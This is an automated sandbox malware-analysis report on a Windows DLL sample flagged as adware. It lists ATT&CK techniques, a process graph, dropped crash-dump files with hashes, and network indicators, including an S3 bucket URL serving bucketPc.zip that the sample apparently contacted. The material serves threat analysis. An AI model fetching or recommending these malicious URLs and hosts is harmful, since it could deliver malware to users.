Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,15_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_004142E0
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
111
Process Injection
2
Masquerading
OS Credential Dumping31
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1408464 Sample: decrypt-main.dll.exe Startdate: 13/03/2024 Architecture: WINDOWS Score: 56 31 s3-r-w.sa-east-1.amazonaws.com 2->31 33 bucreate203920233.s3.sa-east-1.amazonaws.com 2->33 37 Multi AV Scanner detection for submitted file 2->37 9 loaddll64.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 14 9->11         started        15 cmd.exe 1 9->15         started        17 rundll32.exe 9->17         started        19 7 other processes 9->19 dnsIp6 35 s3-r-w.sa-east-1.amazonaws.com 16.12.1.62, 443, 49729 unknown United States 11->35 39 System process connects to network (likely due to code injection or exploit) 11->39 21 WerFault.exe 16 11->21         started        23 rundll32.exe 15->23         started        25 WerFault.exe 17->25         started        27 WerFault.exe 16 19->27         started        signatures7 process8 process9 29 WerFault.exe 20 16 23->29         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
decrypt-main.dll.dll62%ReversingLabsWin64.Adware.RedCap
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.sa-east-1.amazonaws.com
16.12.1.62
truefalse
    high
    bucreate203920233.s3.sa-east-1.amazonaws.com
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipqJrundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipJrundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://upx.sf.netAmcache.hve.7.drfalse
              high
              https://bucreate203920233.s3.sa-east-1.amazonaws.com/:rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 00000011.00000002.1839230847.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dllfalse
                  high
                  https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip~Krundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://bucreate203920233.s3.sa-east-1.amazonaws.com/Rrundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipx7Erundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        16.12.1.62
                        s3-r-w.sa-east-1.amazonaws.comUnited States
                        unknownunknownfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1408464
                        Start date and time:2024-03-13 16:50:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:decrypt-main.dll.dll
                        (renamed file extension from exe to dll)
                        Original Sample Name:decrypt-main.dll.exe
                        Detection:MAL
                        Classification:mal56.evad.winDLL@26/17@1/1
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:Failed
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target rundll32.exe, PID 7532 because it is empty
                        • Execution Graph export aborted for target rundll32.exe, PID 7924 because it is empty
                        • Execution Graph export aborted for target rundll32.exe, PID 8048 because it is empty
                        • Execution Graph export aborted for target rundll32.exe, PID 8068 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: decrypt-main.dll.dll
                        TimeTypeDescription
                        16:51:05API Interceptor1x Sleep call for process: loaddll64.exe modified
                        16:51:15API Interceptor4x Sleep call for process: WerFault.exe modified
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        s3-r-w.sa-east-1.amazonaws.comappdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                        • 3.5.234.32
                        appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                        • 3.5.233.174
                        00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                        • 3.5.232.137
                        00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                        • 16.12.1.14
                        0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                        • 3.5.232.21
                        0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                        • 3.5.234.1
                        0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                        • 3.5.232.185
                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                        • 52.95.163.114
                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                        • 16.12.0.34
                        DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                        • 52.95.164.60
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19E-dekont.exeGet hashmaliciousAgentTeslaBrowse
                        • 16.12.1.62
                        MT103.exeGet hashmaliciousAgentTeslaBrowse
                        • 16.12.1.62
                        BL copy.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 16.12.1.62
                        2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 16.12.1.62
                        Bibeskftigelserne221.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 16.12.1.62
                        https://us02web.zoom.us/j/81580289193?pwd=VjdCRUE1bjQ4dEpWUkpOR0poRm12dz09Get hashmaliciousUnknownBrowse
                        • 16.12.1.62
                        Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 16.12.1.62
                        Scanned PO Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 16.12.1.62
                        EandP_approval_0311202401266.vbsGet hashmaliciousXWormBrowse
                        • 16.12.1.62
                        2403131462348155_BPCT1203172627_txn_recipt.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 16.12.1.62
                        No context
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8478708389277979
                        Encrypted:false
                        SSDEEP:96:9NFGWd67uiyyKyusjZ4RvSCppfxPQXIDcQtZc6t1ZcEmcw3HXaXz+HbHgSQgJjeC:fztiyyuJ4097Z8jj2uwzuiFOZ24lO8J
                        MD5:ACA9EB238F07C35892315F3BD3B1D039
                        SHA1:5C412B30FF218604300D8676883E6168058CDD44
                        SHA-256:A86C01BE89E6E233D67F67160F11770E394CAA60CC083E1C08E30502C484E8E8
                        SHA-512:05D49C219D4CA0379286BCD68BCEA5887A2484FBA917D7E9B434B186EA8301FAD4FC96F2027CFC6B2E4722B1D321BFD6F82F9D294F7388F26996A48CA40129F2
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.2.4.1.2.5.5.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.3.0.2.1.9.2.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.9.e.2.9.e.1.-.0.5.c.f.-.4.4.e.3.-.9.7.1.6.-.d.c.1.6.d.6.4.5.6.d.7.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.c.b.d.2.7.7.-.2.2.4.6.-.4.9.a.5.-.9.7.5.2.-.9.7.8.3.a.8.0.6.d.b.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.4.-.0.0.0.1.-.0.0.1.4.-.2.d.4.4.-.e.7.3.f.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8549111971973986
                        Encrypted:false
                        SSDEEP:192:2vP6i6hy6tD06UZMKFBj2uwzuiFOZ24lO8W:Tipgw6yMEBj4zuiFOY4lO8W
                        MD5:84A48DC50389595FC31E329F9E4A3654
                        SHA1:D64DF82EDEC7BB4ADB942F4060339148C5BBCBB5
                        SHA-256:D03A4DCA4FC1A507B839242744E4F7E5E197DE389439938C0036C5BC82D01EFE
                        SHA-512:D201809A8E16262060D811EAEB8CDD52C5E20AEC67A5A8CDE797C0B84488B133E9688DCA5927D58A4301E8F4BC19C7868EC7D637A17D4EBED7FE7821D479B7C4
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.5.6.2.0.1.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.6.1.8.2.6.2.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.3.5.b.4.4.d.-.4.3.c.f.-.4.3.3.6.-.9.f.4.b.-.7.f.9.4.9.4.9.d.f.c.2.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.2.b.8.b.3.7.-.a.4.1.3.-.4.7.d.2.-.b.1.5.5.-.f.2.8.1.1.4.8.8.5.c.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.4.-.0.0.0.1.-.0.0.1.4.-.5.5.b.8.-.c.6.4.1.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8546204183284704
                        Encrypted:false
                        SSDEEP:192:wVgyfIilyGD06UZMKFBj2uwzuiFOZ24lO8W:wxIigGw6yMEBj4zuiFOY4lO8W
                        MD5:F07E4AB95488B68AE4FC98FB29E35451
                        SHA1:D18CD4702F440112E89C95AAF30B64276E99F8A1
                        SHA-256:63D22D5D6A4E0F6C29887BD20128A5B4D064A7E13EADDB05CC67650608D5D3EB
                        SHA-512:53FD6A7EBDA17E7C2391D8E6E49173028C0F945C5DBE7BB629B3F8FAC89FBD6C53E4CB4A30B79EB63FFE2458439B426E190B995FAB4B5385D43BFC2D7F86F33F
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.6.5.4.2.7.7.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.7.6.8.3.4.0.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.8.8.a.8.0.a.-.d.e.1.f.-.4.e.a.f.-.b.9.b.3.-.2.e.a.4.a.5.9.f.0.1.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.9.3.9.a.b.5.-.1.1.3.8.-.4.4.9.d.-.a.1.e.a.-.8.0.0.a.1.d.3.2.4.f.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.8.7.2.9.-.4.8.3.c.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.105367833591836
                        Encrypted:false
                        SSDEEP:192:AMVjiFytDI03+3h6j2undjfNzuiFOZ24lO8J:ZZiAtDj3+3ojZNzuiFOY4lO8J
                        MD5:8B17E7AC2A50B78161935051F2F449F7
                        SHA1:F9F0A829846B6ECFF7CA4A51EC9F5E9CF3093B99
                        SHA-256:09349B3BF467C5635D97CA66EA18E255B293D5705E0E72F67E7A59BDF752C429
                        SHA-512:E7C89B3EFD78278D555BC74F7D522B6D145E470EA5BFDCC88E40A371EAEFD95C3FB27FC3ACAAABEBF11B715B44FF287C4B111E4BE505EA843A268AECF8C50234
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.8.9.0.1.7.2.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.0.2.4.5.4.6.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.c.e.d.0.b.6.-.a.5.1.a.-.4.5.2.7.-.9.a.c.5.-.1.0.8.2.6.0.8.2.6.6.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.7.8.9.4.e.6.-.4.2.5.1.-.4.7.0.5.-.9.3.4.b.-.0.9.3.5.e.e.0.4.c.7.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.c.-.0.0.0.1.-.0.0.1.4.-.1.a.c.a.-.4.5.3.c.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 15:51:02 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):69140
                        Entropy (8bit):1.5848665095012717
                        Encrypted:false
                        SSDEEP:192:b/TO9d9xiOMJ633RjgwpAqZwTm7xyECfFXkuLWgJ:DY9XAW3R7AqZwTm7xVCyuV
                        MD5:6BD4D9D16CF255078E84A90B631342C9
                        SHA1:B66ECA4D94BD69A357C8AD8F8BD82ABE51134F88
                        SHA-256:333BFAE4645EC6133F7140AAF48A220AF1AACA841A1E0FA2A9BB9F9BC8F8E538
                        SHA-512:F9C0B799499605B7A263DF5767602096E9718CF31C0778F55976CCBF57A99291C49F979EBFD853C5B98E1C38B7391C126A9C2664FFC8CA447F7EF68EA059E316
                        Malicious:false
                        Preview:MDMP..a..... .......f..e....................................4...~3..........T.......8...........T...............D...........P...........<...............................................................................eJ..............Lw......................T...........f..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8794
                        Entropy (8bit):3.702396505816361
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJ9njAzd6YhCllgmf3rWFnprO89b1LDfgCHm:R6lXJpAzd6Y03gmf3rWF91vfgb
                        MD5:78CE958AB74F543777C93321C5EC8B92
                        SHA1:188AFC5BC82EE94D221D3820BF2C26880AE30FCD
                        SHA-256:0B60E0E93695637843AE655EDD64B2557511815BE860DC0FF63406A6136AC444
                        SHA-512:FF2A0FE0116D3D82802A2BF140FD3E6305249165E91A6D4EA773FEC5BF1EF55C207FF10B016768745024168BA2ACCD9A0A2B61F40DD9B45561065A54A3803391
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4784
                        Entropy (8bit):4.480323515110818
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zs0Jg771I9VaWpW8VYDYm8M4JC2CUKFJyq85mQ5ptSTSFd:uIjfyI7yb7VPJaupoOFd
                        MD5:E8E12C6114548A0DE21508C93F9FC95B
                        SHA1:BA7DC8320ACDA110C02BBEA3146C09317530AA9E
                        SHA-256:6AE2BA58913A7E7B9F928E939D4113C9A8BFACF02ECDAD96FCC38773B973F5F1
                        SHA-512:011D90C03841752425486552C1C18A4D1F82302AA60676C9A9B561A33ED433C8D6B44ABC3D3546F77B6D25141D30A10D135430A628654A7F9C8712DFA8675C15
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 15:51:05 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):58108
                        Entropy (8bit):1.6976999797195729
                        Encrypted:false
                        SSDEEP:192:AVVe20+XueOMRCk/TDjfM4YQ54PXdwaHPMmsa2cchCLyYK:0M2l+ZAv/TDjfM4YVHPbF4CLBK
                        MD5:BD0C640F100B31214C2C206CEE1F977E
                        SHA1:D607F980205F602C97A6A61CD33E3288F37AC150
                        SHA-256:C6CF2D8F6ABD0ED0793014C1416EFBCAB99565D646A81E3D6FC3CC79E463E6CC
                        SHA-512:1985FDCBFAC491CB581B67044034CEEA0202FA2609D9E1FDA56AAB9065835042A2DF105B3A68CC10B8B0A95F936946A21405DB8CAB5AD84C5F4E1614D36AEEB6
                        Malicious:false
                        Preview:MDMP..a..... .......i..e........................................~...........T.......8...........T...............,........... ...........................................................................................eJ..............Lw......................T...........i..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):9070
                        Entropy (8bit):3.696079830488304
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJrG3oX6YKQgtOgmf2INmFhprj89b6z8fcvIem:R6lXJa3oX6YvgUgmf2IuI6ofcg
                        MD5:D275B927E3B0D846A47325A9409190D9
                        SHA1:A94048D4BB03F8E46F2743D3BF1F5AA3493856F3
                        SHA-256:2E622E5A8723B7CEB3EA2A2D258545FE78565F00723EEB12911243EC31DC5819
                        SHA-512:314B3D519590B7D76EEF2169EF5A4C66EBAA48B59409287F6B8E934854B7B61F85B0E7786CBD717A005690A38DFFE7C534909F038D26571E80D6084E47A043A6
                        Malicious:false
